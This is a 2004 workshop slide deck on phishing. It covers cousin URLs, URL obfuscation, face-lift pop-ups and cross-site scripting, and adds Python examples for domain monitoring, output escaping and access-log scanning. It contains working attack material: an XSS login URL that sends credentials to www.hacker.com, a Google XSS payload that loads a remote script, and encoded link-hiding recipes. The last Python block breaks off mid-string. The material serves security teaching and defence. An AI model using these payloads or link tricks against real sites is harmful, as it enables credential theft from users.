Phishing exposed

  • 1. Supported by Computer Studies Division, City University of Hong Kong
  • 2. Presented by Mr. Alan Lam, Mr. Bernard Kan and Mr. S.C. Leung (PHISHING)
  • 3. Disclaimer
      • This material is NOT intended to be adopted in the course of attacking any computing system, nor does it encourage such acts.
      • PISA accepts no liability for any act of the user or damage caused in making use of this report.
      • The points made here are deliberately kept concise for the purpose of presentation. If you require technical details, please refer to other technical references.
  • 4. Copyright
      • The copyright of this material belongs to the Professional Information Security Association (PISA).
      • A third party may use this material for non-commercial purposes, provided that the meaning or interpretation of the content is not changed and reference is made to PISA. All rights are reserved by PISA.
  • 5. Agenda
      1. Overview of Phishing
         1.1 What is Phishing?
         1.2 Examples of Phishing: email, web site
         1.3 Current Profile of Phishing Attack
      2. Attack Strategies & Technologies and Defenses
         2.1 Cousin URL Attack
         2.2 URL Obfuscation Attack
         2.3 Face Lift Attack
         2.4 Cross-site Scripting Attack
         2.5 Visual Spoofing Attacks
         2.6 Other Attacks
      3. Defense Strategies Against Phishing Attack
         3.1 Policy and User Education
         3.2 Prevention
         3.3 Detection
         3.4 Incident Response and Collaboration
         3.5 Long-term Development in Technology Infrastructure and Legislation
  • 6. 1.1 What is Phishing? Phishing attacks use spoofed e-mails and fraudulent websites designed to fool recipients into divulging personal financial data such as credit card numbers, account usernames and passwords, social security numbers, etc. (Quoted from http://www.antiphishing.org)
  • 7. Origin of Term
      • Phreaking + Fishing = Phishing
      • Phreaking: exploiting vulnerabilities of the phone system to make calls without paying, in the 1970s
      • Fishing: use of bait to get the target on the hook
  • 8. Why has Phishing become a threat to us?
      • Online transactions, such as e-banking, are becoming more and more popular
        – VeriSign July 2004 report: e-commerce grew 13.2% year on year
      • In order to make their online transaction services easy to use and to please their customers, some service providers sacrifice good security features, such as user certificates.
      • Fancy web features (DHTML, Java, ActiveX, Flash, XML) introduce new web vulnerabilities that most service providers and browser vendors have not caught up with. And these web features are supported by most email/news readers, search engines, chat rooms and ICQ.
      • Spamming technology and facilities are maturing. Legislation in this area cannot catch up.
      • The Internet being a virtual world, it lacks a physical identity for users to validate. Trust building is an intrinsic problem.
      • The current Internet infrastructure is insecure by default.
      • It is much cheaper and safer for attackers to carry out fraud on the Internet.
      • All the above points encourage attackers to seek financial profit through phishing attacks.
  • 9. How does Phishing work?
      • Social engineering, used in the crafted spam email and the fake web site
        – Use a spoofed identity (of a trusted organization) to gain trust
        – Use the wording and tone that the trusted organization usually uses
        – Emphasize an urgency to "update" or "validate" data to rectify a problem
        – Threaten to terminate the account or to process the mistaken transaction
        – Inform the user of a free coupon or a lottery win as part of a product promotion
      • Luring the victim to a bogus website (the net in fishing)
        – Convincing URL
        – Disguised web interface
          • Make the bogus web site look like the original web site
          • Detail down to fonts, company logo, or even the browser UI
        – When users log in to the bogus website, the username and password are captured.
  • 10. Workflow of Phishing Attack
      1. Preparation
         a. Research and development
            • Identify the target organization
            • Identify the vulnerabilities of the target organization's web pages
            • Identify the vulnerabilities of email readers and web browsers that can facilitate the attack
         b. Prepare the scam email and the capture website according to the information collected above
         c. Gather or purchase email addresses
         d. Ride on an SMTP open relay or purchase similar services
      2. Attacking
         a. Send out the scam mail (the bait) via open relay servers / services
         b. Post the scam mail to newsgroups, chat rooms, ICQ messages or banner advertising
         c. Submit the bogus website to search engines
         d. Wait for victims at the capture website (the trapping net)
      3. Harvesting
         a. Collect the data captured at the capture website
         b. Use or sell the data or the captured hosts
  • 11. Phishing Categories
      • Attackers' objectives
        – Fraud in money transfer
        – Fraud in personal information theft
        – Installing key loggers and Trojans for other purposes, such as using the host as a proxy for other attacks
      • Loss and damage
        – Financial
        – Leakage of sensitive information
        – Control of the computer falls to the attacker
        – Damage to branding and corporate image
        – Damage to consumer confidence in online transactions, eventually impacting the development of e-commerce
      (Image source: www.jcsbank.com/phishing.html)
  • 12. Demonstration 1: Examples of Phishing
      • PayPal
      • eBay
      • Hang Seng Bank
      • HSBC
      • Citibank
      • US Bank
      • SunTrust Bank
      • Citizens Bank
  • 13. 1.3 Current Profile of Phishing Attack: References
      • VeriSign Internet Intelligence Briefing (2004-07)
        – http://www.verisign.com/stellent/groups/public/documents/white_paper/006583.pdf
      • Anti-Phishing Working Group (APWG) Trend Report (2004-06)
        – http://www.antiphishing.org/APWG_Phishing_Attack_Report-Jun2004.pdf
      • Gartner Report (2004-06)
        – Internet banking fraud had brought about losses of US$2.4B
        – http://www.itu.int/osg/spu/newslog/categories/indicatorsAndStatistics/2004/06/21.html#a692
      • Hong Kong Police Statistics (2004-07)
  • 14. Anti-Phishing Working Group Trend Report (2004-06): Monthly unique phishing attacks
      Month     Count of unique attacks
      Jan-04      176
      Feb-04      282
      Mar-04      402
      Apr-04    1,125
      May-04    1,197
      Jun-04    1,422
  • 15. Phishing Attack Targets (APWG 2004-06)
      1. Citibank
      2. eBay
      3. US Bank
      4. PayPal
      12. VISA
      17. HSBC
  • 16. Phishing Web Site Location
      VeriSign (2004-07)                 APWG (2004-06)
      Country          Percentage        Country          Percentage
      USA              63                USA              27
      South Korea      10                South Korea      20
      Mainland China    5                Mainland China   16
      Brazil            2                Taiwan            7
      Poland            2                Holland           3
      • Phishermen usually choose a location (APWG 2004-06)
        – where there is a language or time-zone difference with the brand owner, to create a barrier to closing down the bogus web site
        – on compromised machines (25% by analysis)
  • 17. Phishing Sender Source: VeriSign (2004-07) and APWG (2004-06)
      (Two pie charts, each split into Spoofed Address, Cousin Address and Web Email Address. Spoofed addresses dominate both: 92% in the VeriSign data and 93% in the APWG data; cousin addresses and web e-mail addresses share the remainder, the small slices reading 1%, 2%, 5% and 7%.)
  • 18. Phishing impact can be great
      • Impact in the USA (Gartner Report 2004-06)
        – 57 million US consumers attacked
        – 3–5% of recipients became victims
        – About 1.98 million reported their accounts intruded
        – Loss involved was US$2.4 billion (average loss per victim US$1,200)
  • 19. Phishing and Bogus Websites in Hong Kong
      (Chart: "Phishing and Bogus Website Report", reported cases per month from mid-2003 to mid-2004, two series: Phishing Report and Bogus Website; monthly counts run from zero up to the mid-forties. Source: Hong Kong Police Force)
  • 20. 2. Attack Strategies and Technologies
      • Before 2003, social engineering was the major attack
        – Email with impersonated name and logo, together with a disguised tone of message
        – Two technical tricks were also used
          • Cousin URLs carrying a similar name
          • Bogus URLs using old techniques
      • Since 2003, technologies have emerged to trick the browser, or even mimic the SSL web page style
        – Face Lift
        – Bogus URLs using new techniques
        – Cross-site Scripting
        – Visual Spoofing
        – Other attacks
  • 21. 2.1 Cousin URL
      Hong Kong banking bogus websites (source: Hong Kong Police Force)
        – 2003 (Jan–Dec): 8 cases
        – 2004 (Jan–Jul): 18 cases
      Some cousin URLs as examples (real site, followed by the bogus cousin URLs)
        – www.hkbea.com: www.eastasiacredit.com, www.onlinebea.com
        – www.hsbc.com: www.hkhsbc.com
        – hk.dbs.com: www.dbshk.net
        – www.standardchartered.com: www.scbltd.com
        – www.dahsing.com: www.dasxin.com, www.dlfh.com
        – www.iba.com.hk: www.ibabankhk.com, www.hkiba.com
        – More…
  • 22. Cousin URL: https://visa-secure.com/personal/secure_with_visa/
  • 23. 2.2 URL Obfuscation Attack
      • Normal representation of a URL
        – Domain: http://www.pisa.org.hk
      • Dotted representation of the IP address in a URL
        – Decimal: http://202.81.255.242
        – Hexadecimal: http://0xca.0x51.0xff.0xf2
        – Octal: http://0312.0121.0377.0362
      • Dot-less representation of the IP address in a URL
        – Decimal: http://3394371570 (listed alongside http://7689338866, the same value plus 2^32, which only works on clients that truncate the number to 32 bits) …
        – Hexadecimal: http://0xCA51FFF2
        – Reference: a dot-less decimal IP calculator can be found at http://www.tcp-ip.nu/cgi-bin/tcp-ip/calc.cgi
  • 24. 2.2 URL Obfuscation Attack
      • Valid use of "@"
        – RFC 1738 (URL) and RFC 2396 (URI Generic Syntax) allow the URL syntax <user>:<password>@<host>:<port>/<url-path>
        – Application: use the URL to carry a username and password, e.g.
          • ftp://user1:pass@myftp.com:1021/public/file1.gzip
      • Malicious use of "@" to hide the bogus host (everything before "@" is user information, not the host)
        – http://www.microsoft.com@www.pisa.org.hk
        – http://www.microsoft.com@202.81.255.242 (IP address)
        – http://www.microsoft.com@3394371570 (decimal representation)
        – http://www.microsoft.com111111111111111111111111111111111111111111111111111111111111111@3394371570 (the padding pushes the real host out of the visible part of the address bar)
      • The browser's address bar and status bar CAN DISPLAY the actual content, but a normal user may not notice
  • 25. 2.2 URL Obfuscation Attack
      • Escaped encoding (or % encoding)
        – RFC 1738 (URL) and RFC 2396 (URI Generic Syntax) allow URL characters to be written as "%##", the ASCII code in hexadecimal (##: 00–FF)
          • %20 = [space], %2E = ".", %7E = "~"
          • %31 = "1", %32 = "2"
          • %41 = "A", %61 = "a"
        – Where will this URL bring you to?
          • http://www.microsoft.com@%79%61%68%6F%6F%2E%63%6F%6D
          • It decodes to http://www.microsoft.com@yahoo.com
      • The browser's address bar and status bar CAN DISPLAY the actual content, but a normal user may not notice
      • Reference on % encoding, with an online encoder/decoder: http://www.blooberry.com/indexdot/html/topics/urlencoding.htm
  • 26. 2.2 URL Obfuscation Attack
      • Other derived formats of the URI
        – "Unicode" (character-entity) encoded URL: HTML numeric character references (&#NNN;, the decimal code of each character) are decoded by the browser before the link is followed, so a hostname can be written as
          • http://&#119;&#119;&#119;&#46;&#112;&#105;&#115;&#97;&#46;&#111;&#114;&#103;&#46;&#104;&#107; (= http://www.pisa.org.hk)
        – Mixed character-entity and % encoding
          • http://&#119;&#119;&#119;%2E%70%69%73%61%2E%6F%72%67%2E%68%6B (= http://www.pisa.org.hk)
      • References
        – Unicode encoding: http://www.unicode.org/
        – Free online UTF decoder (choose "Freeform numeric"): http://software.hixie.ch/utilities/cgi/unicode-decoder/utf8-decoder
  • 27. 2.2 URL Obfuscation Attack: IE or other browser vulnerabilities in displaying the proper URL in the status bar and in the address bar
  • 28. URL Obfuscation Attack (Status Bar): HTML constructs that let the status bar show something other than the real link target
      • Inline JavaScript: <A HREF=… onMouseOver=…>
      • <FORM>
      • <TABLE>
      • <TABLE BORDER>
      • Image map
  • 29. URL Obfuscation Attack (Address Bar): IE vulnerability in displaying the URL
      • IE 5.x and 6.0 have a vulnerability in handling URLs: when the URL contains special characters, the character string after the special character is not displayed (Microsoft Knowledge Base article 834489)
      • For example, using the escape-encoded characters %00 (null) and %01:
        – http://www.yahoo.com%01%00@www.pisa.org.hk
        – http://www.yahoo.com%01%00@202.81.255.242
        – http://www.yahoo.com%01%00@3394371570
      • IE brings the user to www.pisa.org.hk, whereas the address bar and status bar do not display the true visited URL!
  • 30. IE vulnerability in displaying URL
      • MS04-004 (2004-02) released a patch that removes support in HTTP for the URI format <user>:<password>@<host>:<port>/<url-path> (http://www.microsoft.com/technet/security/Bulletin/MS04-004.asp)
      • However, after applying the patch, the address bar and status bar still do NOT display the correct URL.
  • 31. Known attack using the MS04-004 issue: the Exploit-URLSpoof Trojan (McAfee alert: http://vil.nai.com/vil/content/v_100927.htm)
  • 32. IE vulnerability in handling URL
      • Works with a DNS server that accepts dummy subdomains (any name under it resolves), e.g. http-equiv.dyndns.org
      • http://www.microsoft.com.technet.security.bulletin.MS04-029.mspx.12345.1234512345123456789012345671234567890123456789.box&&cm=&ce=3&hl=malware.http-equiv.dyndns.org/~http-equiv/mwaresoft.html
      • Effective target = *.http-equiv.dyndns.org/~http-equiv/mwaresoft.html
      • Reference URL: http://www.malware.com/malwaresoft.html
  • 33. 2.2 URL Obfuscation Attack: Shortened URLs
      • http://www.rapp.org/url/
        – PISA: http://www.rapp.org/url/?IUVST6C8
        – Workshop "Phishing Exposed": http://www.rapp.org/url/?KRRQ7YYH
      • http://csua.org/u/
        – PISA: http://csua.org/u/9fy
        – Workshop "Phishing Exposed": http://csua.org/u/9iu
  • 34. Demonstration 2: URL Obfuscation Attacks
  • 35. 2.3 Face Lift
      • Uses a URL redirect or similar technology
      • Takes advantage of the real web site's face to confuse the identity of the bogus login page:
          <META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.anz.com.au/">
      (Screenshot: the real Online Banking main page in the background, with a bogus Online Login pop-up in front asking for Username "myuserid" and Password "*******")
  • 36. Case Study: ANZ bank phishing
      • Email content (link in "%##" hexadecimal format):
          http://anz.com.au%32inetbank%32%32%32@%36%31%2E%31%30%2E%31%32%30%2E%32%30%30:%32%37%38%34/%69%6E%65%74%62%61%6E%6B/%69%6E%64%65%78%2E%68%74%6D
      • Bogus URL, old technique (decoded):
          http://anz.com.au2inetbank222@61.10.120.200:2784/inetbank/index.htm
  • 37. Content of the BOGUS web page http://61.10.120.200:2784/inetbank/index.htm
      (1) Pop-up login page:
          <script LANGUAGE="JavaScript">
          :
          SafeAddOnload(PUWStart);
          gPopupWindow = new PopupWindow("login.htm", 350, 150);
          gPopupWindow.toolbar = false;
          gPopupWindow.statusbar = true;
          gPopupWindow.resizable = true;
          gPopupWindow.ontop = true;
          </script>
          </head>
          <body bgcolor="#FFFFFF" text="#000000">
      (2) Background redirect to the real site:
          <META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.anz.com.au/">
  • 38. Online Banking Login (Bogus)
      (1) Pop-up login page: no SSL
      (2) Background redirect: <META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.anz.com.au/">
  • 39. Case Study: ANZ bank phishing, Face Lift (screenshot: the real ANZ page (2) loaded behind the bogus pop-up (1) asking for userid and password)
  • 40. Case Study: ANZ bank phishing, Track Hiding (screenshot: after the PIN is entered, an SSL padlock is shown ??!!)
  • 41. Online Banking Login (real): the real digital certificate of the web site; the real login has the SSL padlock
  • 42. Defense vs. Cousin URL (Prevention)
      • Use a consistent and persistent web interface
      • Communicate a single, simple domain name
      Counter-example: XYZBank owns these domains and has web servers for each
        – xyzbank.com, xyzcorp.com, xyzgroup.com
      They use these domains for online banking
        – online-xyzbank.com, secure-xyzbank.com
      They use these domains for HK and Australia online banking
        – online-xyzbank.com.hk, secure-xyzbank.com.au
  • 43. Defense vs. Cousin URL (Prevention): Is this better?
      XYZBank owns these domains
        – xyzbank.com (only active domain)
        – xyzcorp.com (forwards to xyzbank.com)
        – xyzgroup.com (forwards to xyzbank.com)
      They use these subdomains for online banking
        – online.xyzbank.com (personal banking)
        – secure.xyzbank.com (corporate banking)
      They use these URL paths for HK and Australia online banking
        – online.xyzbank.com/hk/
        – secure.xyzbank.com/au/
  • 44. Defense vs. Cousin URL (Detection)
      • Brand management
      • Domain monitoring
      • Web crawling
      • Intelligence reports from spam filtering services
      (These can be outsourced)
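Domain monitoring, the second item on slide 44, needs a rule for deciding whether a newly registered name is a cousin of a brand. The Python below is an added example (not PISA's code) that flags the cousin URLs from slide 21: it reduces a domain to its registrable label, strips the filler words phishers bolt on ("online", "secure", "hk", "ltd", ...), and then tests containment and string similarity against a brand-alias list. The brand aliases, the owned-domain list and the 0.75 similarity threshold are assumptions chosen for this illustration.

```python
"""Cousin-URL detector for a domain-monitoring feed.

Added example with assumed brand aliases and owned domains; the slides' own cousin
URLs (hkhsbc.com, onlinebea.com, dbshk.net, scbltd.com, dasxin.com, hkiba.com) are
the inputs it is meant to catch.
"""
import difflib

# Assumed: brand -> labels that stand for it (acronym, full name, transliteration).
BRAND_ALIASES = {
    "hsbc": ("hsbc",),
    "bea": ("hkbea", "bea", "eastasia"),
    "dbs": ("dbs",),
    "scb": ("standardchartered", "scb"),
    "dahsing": ("dahsing", "daxin"),
    "iba": ("iba",),
}
# Assumed: the domains the brands really own, so the monitor does not flag them.
OWNED = {"www.hsbc.com", "www.hkbea.com", "hk.dbs.com", "www.standardchartered.com",
         "www.dahsing.com", "www.iba.com.hk"}
# Generic words phishers bolt onto a brand name; removed before comparing.
FILLER = ("online", "secure", "ebank", "bank", "ltd", "hk")
TWO_LEVEL_SUFFIXES = {"com.hk", "org.hk", "net.hk", "com.au", "co.uk"}


def core_label(domain):
    """Registrable label with filler words removed: 'www.dbshk.net' -> 'dbs'."""
    labels = [l for l in domain.lower().strip(".").split(".") if l and l != "www"]
    if not labels:
        return ""
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LEVEL_SUFFIXES:
        label = labels[-3]
    else:
        label = labels[-2] if len(labels) >= 2 else labels[0]
    for word in FILLER:
        label = label.replace(word, "")
    return label


def cousin_matches(domain, threshold=0.75):
    """Brands that `domain` imitates, by containment of the core label or by similarity.

    Containment catches brand+filler names (hkhsbc, onlinebea); the difflib ratio
    catches near-misses such as the transliteration dasxin vs. daxin / dahsing.
    """
    domain = domain.lower().strip(".")
    if domain in OWNED:
        return []
    cand = core_label(domain)
    if len(cand) < 3:          # too short to say anything; avoids '' in x matches
        return []
    hits = []
    for brand, aliases in BRAND_ALIASES.items():
        for alias in aliases:
            acore = core_label(alias)
            contained = len(acore) >= 3 and (acore in cand or cand in acore)
            similar = difflib.SequenceMatcher(None, cand, acore).ratio() >= threshold
            if contained or similar:
                hits.append(brand)
                break
    return hits


if __name__ == "__main__":
    for name in ("www.hkhsbc.com", "www.onlinebea.com", "www.eastasiacredit.com",
                 "www.dbshk.net", "www.scbltd.com", "www.dasxin.com", "www.hkiba.com",
                 "www.pisa.org.hk"):
        print(name, "->", cousin_matches(name))
```

The alias list does the real work: "eastasiacredit" has no string resemblance to "hkbea", and only the full-name alias "eastasia" catches it. A production monitor would feed this from brand-owned names plus known transliterations, and review the hits by hand, since a short core label such as "sta" would also match "standardchartered".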
  • 45. Detection (Server side)
      • Detect mirroring by a copycat web site
        – Monitor large-volume traffic, especially from a single subnet
        – Place honeypot links (invisible links with no legitimate use) and check the access log for hits on them
      • Detect the referral site
        – Monitor the referrer information in your web server's access log; it may reveal the referral site, a search engine, or an attacker using a Face Lift / framing / similar attack
  • 46. Server and Site Design Reference
      • PISA's HK e-Commerce Security Survey 2003
        – Non-intrusive and anonymous study of 25 local online transaction sites
          • Application design
          • SSL and encrypted communication; digital certificate implementation
          • Password management
          • Operation control
        – URL: http://www.pisa.org.hk/projects/websec2003/websec2003.htm
  • 47. Detection (Client side): Browser – check the digital certificate, and turn on the alert when the browser enters or leaves SSL mode
  • 48. Detection (Client side)
      • SpoofStick (browser plug-in)
      • eBay Toolbar (browser plug-in)
        – Incorporates "Web CallerID" technology (acquired from WholeSecurity) to detect suspicious activity in a web page. Web CallerID acts like a heuristic filter for phishers, detecting previously undiscovered spam
        – http://www.eweek.com/article2/0,1759,1636422,00.asp
  • 49. Detection (Client): Some antivirus programs detect malicious pop-up JavaScript in web pages
  • 50. Detection (Client): http://%32%31%31%2E%39%37%2E%32%34%38%2E%36%30:%38%37/%63%69%74/%69%6E%64%65%78%2E%68%74%6D (decodes to http://211.97.248.60:87/cit/index.htm)
  • 51. 2.4 Cross-Site Scripting
      • A cross-site scripting vulnerability allows the introduction of malicious content (scripts) on a web site, which is then served to users (clients)
        – Malicious scripts get executed on clients that trust the web site
        – A problem with potentially all client-side scripting languages
      • Use "XSS" to refer to these vulnerabilities, to avoid confusion with "CSS" (Cascading Style Sheets)
  • 52. XSS Concept
      • Any way to fool a legitimate web site into sending malicious code to a user's browser
      • Almost always involves user (third-party) content
        – Error messages
        – User comments
        – Links
      • References
        – http://www.cert.org/archive/pdf/cross_site_scripting.pdf
        – http://www.spidynamics.com/support/whitepapers/SPIcross-sitescripting.pdf
  • 53. Why the Name
      • You think that you interact with site Z
      • Site Z has been poisoned by the attacker
      • The "poison" (e.g. JavaScript) is sent to you along with legitimate content, and executes. It can exploit browser vulnerabilities, or contact site M and steal your cookies, usernames and passwords...
      (Diagram: you surf site Z; the poison arrives from Z; the hostile code executes in your browser and talks to site M)
  • 54. XSS Risks
      • Theft of account credentials and services
      • User tracking (stalking) and statistics
      • Misinformation from a trusted site
      • Denial of service
      • Exploitation of the web browser
        – Create a phony user interface
        – Exploit a bug in the browser
        – Exploit a bug in a browser extension such as Flash or Java
      • Etc.
  • 55. XSS Risks – Stolen Account Credentials
      • With XSS, it may be possible for your credentials to be stolen and used by the attacker
      • Sites requiring authentication need a technological solution to avoid continuously asking users for passwords
        – Credentials take the form of a session ID or nonce
      • URL encoding (GET method)
        – http://www.site.com?ID=34539027644
      • Cookies are commonly used to store credentials
        – These are usually accessible to client-side scripts
  • 56. Cookie Mechanism and Vulnerabilities
      • Used to store state in the client browser
      • Access control
        – Includes a specification of which servers can access the cookie (a basic access control), including a path on the server
        – So a cookie can be used to store secrets (session IDs or nonces)
  • 57. XSS – The Point
      • XSS vulnerabilities fool the access control mechanism for cookies
      • The request for the cookie (by the script) comes from the poisoned server's page, and so is honored by the client browser
        – No vulnerabilities needed in the client browser
  • 58. XSS Risk – Privacy and Misinformation
      • Scripts can "spy" on what you do
        – Access the history of sites visited
        – Track content you post to a web site
      • Scripts can misinform
        – Modify the web page you are viewing
        – Modify content that you post
      • Privacy ("I have nothing to hide")
        – Knowledge about you can be valuable and be used against you
          • Divorces, religion, hobbies, opinions, etc.
  • 59. Example: Google's XSS Vulnerability
      • Just made public on 20 October (2004)
      • Scripts can be injected into Google (here through the cof=L: parameter of the custom search page) to make it appear to become a subscription service:
        – http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27
        – The cof=L: value decodes to javascript:javascript:document.appendChild(document.createElement('script')).src='http://jibbering.com/test2.js'
  • 60. Example: Google's XSS Vulnerability (screenshot)
  • 61. XSS Risk – Denial of Service
      • Nasty JavaScript can make your web site inaccessible
        – Make browsers crash or become inoperable
        – Redirect browsers to other web sites
  • 62. XSS Risk – Silent Install
      • Exploitation of browser vulnerabilities
        – JavaScript, ActiveX, etc. allow the exploitation of browser vulnerabilities
        – Code runs locally on your machine
      • User security confirmation bypass vulnerability in Microsoft Internet Explorer 6.0 SP2
        – http://securityfocus.com/bid/11200/
        – Allows malicious users to trivially bypass the requirement for user confirmation to load JavaScript or ActiveX
        – Installation of malicious code
  • 63. XSS Risk – Phishing
      • User interface modifications
        – Present fake authentication dialogs, capture information, then perhaps redirect the user to the real web site
        – Replace the location toolbar to make the user think they are visiting a certain web site
      • Phishing scenario
        – Victim logs into a web site
        – Attacker has spread "mines" using an XSS vulnerability
        – Victim stumbles upon an XSS mine
        – Victim gets a message saying that their session has expired and they need to authenticate again
        – Victim's username and password are sent to the attacker
  • 64. Demonstration 3 – www.pisabank.com
  • 65. After successful user login...
  • 66. However, if login failed...
  • 67. Try to put scripts in the URL...
  • 68. Reveal the injected scripts...
  • 69. Target: inject code like this...
  • 70. We create the following URL (the err parameter closes the real login form and opens a new one whose onsubmit sends the typed login and password to www.hacker.com):
      http://www.pisabank.com/banklogin.jsp?serviceName=PisabankCaastAccess&templateName=prod_sel.forte&source=Pisabank&AD_REFERRING_URL=http://www.pisabank.com&err=%3C/form%3E%3Cform%20action=%22login1.asp%22%20method=%22post%22%20onsubmit=%22XSSimage%20=%20new%20Image;XSSimage.src=http://www.hacker.com/%20%2b%20document.forms(2).login.value%20%2b%20:%20%2b%20document.forms(2).password.value;%22%3E
  • 71. Put the URL in scam mails...
  • 72. When the hyperlink is clicked...
  • 73. After the user logs in, nothing special...
  • 74. However... in www.hacker.com's web server log, the login name and password are recorded:
      192.168.0.1 - - [14/Oct/2004:11:01:52 +0800] "GET /bernard:IlovePisa HTTP/1.1" 404 719
  • 75. XSS – Prevention, for users:
      – Disable scripting in the browser (some personal firewalls can selectively block/allow scripts from particular web sites)
      – Do not trust links in e-mails; type the URL directly into the browser
      – Always log out before browsing elsewhere
      – Keep up with web browser patches and versions
  • 76. XSS – Prevention, for administrators/developers:
      – User input should be parsed and filtered properly, especially the characters < > " ' % ; ) ( & + -
      – Some decent guidelines for input filtering can be found in the OWASP Requirements document "OWASP Guide to Building Secure Web Applications and Web Services" (http://www.owasp.org/documentation/guide.html)
      – Output based on input parameters should have its special characters encoded as HTML character entities (the ISO 8859-1 entity references, e.g. &lt; &gt; &quot; &amp;), as recommended in http://www.cert.org/advisories/CA-2000-02.html
  • 77. XSS – Prevention, for administrators/developers:
      – For cookies: set the HttpOnly flag. Scripts that run in the browser cannot access cookie values that have the flag set
      – Keep up with web server patches
      – Periodically test for XSS vulnerabilities using web application scanners, e.g. WebScarab (http://www.owasp.org/software/webscarab.html)
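Slides 76 and 77 give the developer-side rules in the abstract; the Python below is an added example (not the pisabank demo's code) that puts the vulnerable and the hardened rendering of the err parameter side by side and builds the session cookie with the HttpOnly flag. The template, the error-code table and the login page layout are assumptions made for the illustration; the payload is the one from slide 70 with its JavaScript string quotes restored.

```python
"""Vulnerable vs. hardened rendering of the pisabank 'err' parameter, plus cookie flags.

Added example. Assumed: a login-page template that shows an error message, and an
application error-code table. The payload is slide 70's, with quotes restored.
"""
import html
from http.cookies import SimpleCookie

PAYLOAD = ('</form><form action="login1.asp" method="post" '
           'onsubmit="XSSimage = new Image;XSSimage.src=\'http://www.hacker.com/\' + '
           'document.forms(2).login.value + \':\' + document.forms(2).password.value;">')

TEMPLATE = """<form action="banklogin.jsp" method="post">
<p class="error">{msg}</p>
<input name="login"><input name="password" type="password"></form>"""

# Assumed error-code table: the query parameter selects a message, it never supplies one.
ERROR_MESSAGES = {
    "badpw": "Login failed. Please check your user ID and password.",
    "expired": "Your session has expired. Please log in again.",
}


def render_vulnerable(err):
    """Reflect the query parameter verbatim. Slide 70's payload closes the real form and
    opens its own, whose onsubmit leaks the typed credentials to www.hacker.com."""
    return TEMPLATE.format(msg=err)


def render_hardened(err):
    """Allow-list the error code; HTML-encode anything that is still echoed.

    html.escape(quote=True) turns < > & " ' into entities, so the browser renders the
    payload as text instead of parsing it as markup (the CA-2000-02 advice on slide 76).
    """
    msg = ERROR_MESSAGES.get(err)
    if msg is None:
        msg = "Unknown error code: " + html.escape(err, quote=True)
    return TEMPLATE.format(msg=msg)


def form_count(page):
    """How many <form> elements a browser would see; the attack needs a second one."""
    return page.lower().count("<form")


def session_cookie(session_id):
    """Set-Cookie header with HttpOnly (hidden from document.cookie) and Secure (SSL only)."""
    jar = SimpleCookie()
    jar["JSESSIONID"] = session_id
    jar["JSESSIONID"]["path"] = "/"
    jar["JSESSIONID"]["secure"] = True
    jar["JSESSIONID"]["httponly"] = True
    return jar.output(header="Set-Cookie:")


if __name__ == "__main__":
    print("vulnerable forms:", form_count(render_vulnerable(PAYLOAD)))
    print("hardened forms:  ", form_count(render_hardened(PAYLOAD)))
    print(render_hardened(PAYLOAD))
    print(session_cookie("2BCC9DE6CDCFEDD7E25BCF3D689580F2"))
```

Two things the hardened version does that filtering on its own does not: the error code is looked up rather than echoed, so there is nothing attacker-controlled in the page in the normal case, and the fallback encodes on output, where the context (HTML text) is known. HttpOnly does not stop the slide-70 attack, which reads the form fields rather than the cookie, but it does stop the cookie-theft variant of slides 55 to 57.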
  • 78. XSS – Detection: XSS exploits can be detected by reviewing the web server access log, e.g.:
      192.168.1.152 - - [14/Oct/2004:10:38:11 +0800] "GET /banklogin.jsp?serviceName=PisabankCaastAccess&templateName=prod_sel.forte&source=Pisabank&AD_REFERRING_URL=http://www.pisabank.com&err=%3C/form%3E%3Cform%20action=%22login1.jsp%22%20method=%22post%22%20onsubmit=%22XSSimage%20=%20new%20Image;XSSimage.src=http://www.hacker.com/%20%2b%20document.forms(2).login.value%20%2b%20:%20%2b%20document.forms(2).password.value;%22%3E HTTP/1.1" 200 4058
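Slide 45 (honeypot links and referrer monitoring) and slide 78 (XSS payloads in the access log) both come down to reading the server log, so one script covers both. The Python below is an added example, not PISA's tooling: it parses combined-format log lines and flags hits on an invisible honeypot link, login pages reached with a Referer from a host the bank does not own, and decoded query strings that contain markup or event handlers. The sample log lines are constructed for the example (the XSS line is slide 78's request, shortened), and the site's own hostnames, login paths and honeypot path are assumptions.

```python
"""Scan web-server access logs for the server-side phishing indicators on slides 45 and 78.

Added example. Sample lines are constructed in combined log format (the slide's own
line lacks the Referer field); site names, login paths and the honeypot path are assumed.
"""
import re
from urllib.parse import unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
# Markup or event handlers that have no business in a query string once decoded.
XSS_RE = re.compile(
    r'<\s*/?\s*(?:script|form|iframe|img|object)\b|javascript\s*:'
    r'|\bon(?:load|error|submit|click|mouseover|focus)\s*=', re.I)

OUR_HOSTS = {"www.pisabank.com", "pisabank.com"}   # assumed: names the bank owns
LOGIN_PATHS = {"/banklogin.jsp", "/login1.jsp"}   # assumed: pages a phisher fronts
HONEYPOT_PATHS = {"/img/spacer-9f3a.gif"}         # assumed: invisible link, never clicked

SAMPLE_LOG = [  # constructed sample; the XSS request is slide 78's, shortened
    '192.168.1.10 - - [14/Oct/2004:10:30:01 +0800] "GET /index.htm HTTP/1.1" 200 5120 '
    '"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"',
    '192.168.1.152 - - [14/Oct/2004:10:38:11 +0800] "GET /banklogin.jsp?err=%3C/form%3E'
    '%3Cform%20action=%22login1.jsp%22%20method=%22post%22%20onsubmit=%22XSSimage%20='
    '%20new%20Image;XSSimage.src=http://www.hacker.com/%20%2b%20document.forms(2).login'
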